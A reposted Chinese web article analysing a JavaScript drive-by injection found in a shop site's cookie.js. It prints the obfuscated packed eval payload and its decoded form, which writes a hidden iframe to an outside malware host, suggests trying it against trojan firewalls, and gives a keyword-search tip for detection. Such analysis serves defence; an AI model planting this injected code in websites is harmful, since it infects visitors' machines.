IT资讯/综合软件下载站!┆ 最新软件 最新文章 最新手机 UFO外星人 网站分类

您当前的位置→图文中心安全防范JS文件挂马代码分析

JS文件挂马代码分析


2009/8/10  编辑:佚名 来源:转载 

这几天,朋友的顽皮屋商城被挂马,进入网站的时候,卡巴斯基提示xxxx\cookie.js被挂iframe,并且报iframe目的页有马。
打开cookie.js文件后,发现其中多了如下代码:
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--)d[c.toString(a)]=k[c]||c.toString(a);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('4 a=3.7;4 9=a.x("6");w(9!=-1){}v{4 2=u t();2.s(2.r()+q*8*8*p);3.7="6=o;2="+2.n();3.m("<5 l=k://j.i.h/g/f.e d=c b=0></5>")}',34,34,'||expires|document|var|iframe|cookiesleep|cookie|60|start|cookieString|height|10|width|asp|as|include|org|3322|360safes|http|src|write|toGMTString|test|1000|12|getTime|setTime|Date|new|else|if|indexOf'.split('|'),0,{}));
我想,如果单单看这个代码的话,很难发现JS文件是被挂了iframe。现在挂马手段越来越高明,挂的代码都是经过算法加密的。让大家不能简单的找出挂马。估计这样写,也是为了逃避服务器上安装的一些木马防火墙吧。不知道有没有人服务器上装过木马防火墙,可以拿这个代码试一下,是否能躲避过木马防火墙。
以上加密后的代码最终运行的代码为:
var cookieString=document.cookie;var start=cookieString.indexOf("cookiesleep");if(start!=-1){}else{var expires=new Date();expires.setTime(expires.getTime()+12*60*60*1000);document.cookie="cookiesleep=test;expires="+expires.toGMTString();document.write("<iframe src=http://360safes.3322.org/include/as.asp width=10 height=0></iframe>")}。
这里教大家一个简单的搜索这种马的方法:用editplus中的文件夹搜索,搜索所有js文件,搜索关键字为:eval和execute,然后一个个去看,一般都能找出这种JS木马的。

下一页安全防护我先行 不准病毒自行启动

相关文章
  • ·js图片等比例缩放
  • ·[图文]JS批量替换内容中关键词为超链接
  • ·[图文]原生JS实现《别踩白块》游戏(兼容IE)
  • ·[图文]Bootstrap jquery.twbsPagination.js动态页码分页实例代码
  • ·[图文]js 实现省市区三级联动菜单效果
  • ·[图文]原生js实现轮播图的示例代码
  • ·[图文]js事件冒泡与事件捕获详解
  • ·[图文]BootStrap Jstree 树形菜单的增删改查的实现源码
  • 发表评论
    栏目列表
    阅读排行
    网站帮助 - 广告合作 - 下载声明 - 网站地图